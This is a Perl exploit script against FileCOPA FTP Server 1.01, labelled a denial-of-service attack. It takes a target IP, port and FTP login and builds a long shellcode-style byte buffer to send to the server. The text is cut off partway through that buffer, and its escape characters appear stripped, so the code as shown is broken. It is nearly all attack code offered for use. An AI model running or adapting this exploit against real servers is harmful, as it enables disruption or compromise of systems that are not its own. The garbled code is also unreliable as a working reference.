FileCOPA FTP Server 1.01 Denial Of Service

#!/usr/bin/perl # # e-mail: [email protected] # # Date: 04/06/2021 # # Version Vulnerable: FileCOPA FTP Server 1.01 # # OS Tested: Windows XP PACK 3 Brazilian e Windows 2000 # # Youtube video: # # badchars x00x0a use Net::FTP; use Term::ANSIColor; $sis="$^O"; print $sis; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); if ((!$ARGV[0]) || (!$ARGV[1])) { &apresentacao(); } sub apresentacao { print q { ###################################################### # # # [*] FileCOPA FTP Server 1.01 - Denied of Service # # # # [*] Author: Fernando Mengali # # # # [+] Modo de uso: perl # # # ################# Code Exploit ####################### } } our $alvo = $ARGV[0]; our $porta = $ARGV[1]; if (!$ARGV[0] && !$ARGV[1]) { exit; } if($alvo !~ /(d{1,3}.d{1,3}.d{1,3}.d{1,3})/) { print color('red bold'); print "

[-] Por favor, defina o IP alvo!

"; color('reset'); exit; } if($porta < 0 || $porta > 65535) { print color('red bold'); print "

[-] Por favor, defina uma porta de 1 a 65535!

"; color('reset'); exit; } print color('green bold'); print "

Alvo definido =>" .$alvo . "

"; print "Porta definida =>" .$porta . "

"; color('reset'); print color('yellow bold'); print "[+] Por favor, informe a nome de usuário: "; color('reset'); print color('red bold'); my $usuario = ; chomp($usuario); color('reset'); print color('yellow bold'); print "[*] Por favor, informe a senha de acesso: "; color('reset'); print color('red bold'); my $senha = ; chomp($senha); color('reset'); my $buf = "xbax17x61x66xafxdbxd9xd9x74x24xf4x5dx2bxc9" . "xb1x60x31x55x12x83xedxfcx03x42x6fx84x5axb7" . "xa9xf0x15x7bxd9xfbx8fxf7x01x08x75xdcx80x41" . "xd3x13x51xbaxe7x11x4dx39x25x21xb3x27x8bx30" . "xefxf1xacxbdx95xe9xcfx1ax1dxb9xe1xf6x27x0b" . "xffx02x98xc0xf6xc7x19x52xc4x94x18xdbx56x20" . "xb6x9axc4xb5xecxf3x40xd4x19x17x6dx35x50x3a" . "x13xc3xb3xf0x38x8dxffxc5x05x55x33xe7xd2x9e" . "xb6x8cx9bx79x ..

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